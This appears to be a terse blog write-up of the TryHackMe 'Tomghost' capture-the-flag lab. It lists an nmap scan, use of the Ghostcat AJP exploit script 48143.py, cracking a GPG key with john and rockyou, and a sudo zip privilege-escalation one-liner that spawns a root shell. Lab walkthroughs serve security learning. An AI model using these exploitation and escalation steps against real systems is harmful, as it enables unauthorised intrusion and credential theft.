Tomghost CTF


Use nmap to scan for open ports: sudo nmap -sS -sC -sV


22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

53/tcp   open  tcpwrapped

8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)

8080/tcp open  http       Apache Tomcat 9.0.30

searchsploit ajp :

Apache Tomcat - AJP 'Ghostcat File Read/Inclusion 

python /usr/share/exploitdb/exploits/multiple/webapps/48143.py

Welcome to GhostCat

ssh skyfuck@

scp skyfuck@ /home/kali

/usr/sbin/gpg2john tryhackme.asc > hashtry

john –format=gpg –wordlist=/usr/share/wordlists/rockyou.txt hashtry alexandru (tryhackme)

go back to the machine

gpg –import tryhackme.asc

gpg –decrypt credential.pgp


login to merlin and cat the user.txt

sudo -l (root : root) NOPASSWD: /usr/bin/zip

Head to https://gtfobins.github.io/gtfobins/zip/ to find the exploit for zip

TF=$(mktemp -u)

sudo zip $TF /etc/hosts -T -TT 'sh #'

Root gained

cd root to find the final flag

Compromise this machine and obtain user.txt


Escalate privileges and obtain root.txt


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: